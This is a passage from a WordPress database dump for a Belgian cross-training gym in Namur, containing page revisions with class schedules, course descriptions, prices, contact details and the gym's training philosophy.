class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:38:20', '2013-07-04 19:38:20', '', 11, 'http://www.crosstrainingcenter.be/11-revision-105/', 0, 'revision', '', 0),
(286, 1, '2013-07-03 20:45:05', '2013-07-03 20:45:05', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:45:05', '2013-07-03 20:45:05', '', 9, 'http://www.crosstrainingcenter.be/9-revision-16/', 0, 'revision', '', 0),
(287, 1, '2013-07-04 18:19:03', '2013-07-04 18:19:03', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-04 18:19:03', '2013-07-04 18:19:03', '', 9, 'http://www.crosstrainingcenter.be/9-revision-17/', 0, 'revision', '', 0),
(288, 1, '2013-07-04 18:50:46', '2013-07-04 18:50:46', '', 'illu1', '', 'inherit', 'open', 'open', '', 'illu1', '', '', '2013-07-04 18:50:46', '2013-07-04 18:50:46', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(289, 1, '2013-07-03 20:45:08', '2013-07-03 20:45:08', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 5, 'http://www.crosstrainingcenter.be/5-revision-35/', 0, 'revision', '', 0),
(290, 1, '2013-07-04 18:51:42', '2013-07-04 18:51:42', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png\"><img class=\"size-full wp-image-288 alignleft\" alt=\"illu1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png\" width=\"271\" height=\"197\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:51:42', '2013-07-04 18:51:42', '', 5, 'http://www.crosstrainingcenter.be/5-revision-36/', 0, 'revision', '', 0),
(292, 1, '2013-07-04 18:52:28', '2013-07-04 18:52:28', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:52:28', '2013-07-04 18:52:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-38/', 0, 'revision', '', 0),
(294, 1, '2013-07-04 19:00:43', '2013-07-04 19:00:43', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n<blockquote>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n<h1></h1>\r\n</blockquote>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:00:43', '2013-07-04 19:00:43', '', 5, 'http://www.crosstrainingcenter.be/5-revision-40/', 0, 'revision', '', 0),
(295, 1, '2013-07-04 19:01:11', '2013-07-04 19:01:11', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n<blockquote>\r\n<h4>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.</h4>\r\n<h1></h1>\r\n</blockquote>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:01:11', '2013-07-04 19:01:11', '', 5, 'http://www.crosstrainingcenter.be/5-revision-41/', 0, 'revision', '', 0),
(297, 1, '2013-07-04 19:04:28', '2013-07-04 19:04:28', '<h1>Assurer un entraînement de qualité :</h1>\r\n[caption id=\"attachment_102\" align=\"alignnone\" width=\"300\"]<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a> <br><br>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.[/caption]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:04:28', '2013-07-04 19:04:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-43/', 0, 'revision', '', 0),
(296, 1, '2013-07-04 19:02:56', '2013-07-04 19:02:56', '<h1>Assurer un entraînement de qualité :</h1>\r\n[caption id=\"attachment_102\" align=\"alignnone\" width=\"300\"]<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a> Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.[/caption]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:02:56', '2013-07-04 19:02:56', '', 5, 'http://www.crosstrainingcenter.be/5-revision-42/', 0, 'revision', '', 0),
(298, 1, '2013-07-04 19:07:45', '2013-07-04 19:07:45', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:07:45', '2013-07-04 19:07:45', '', 5, 'http://www.crosstrainingcenter.be/5-revision-44/', 0, 'revision', '', 0),
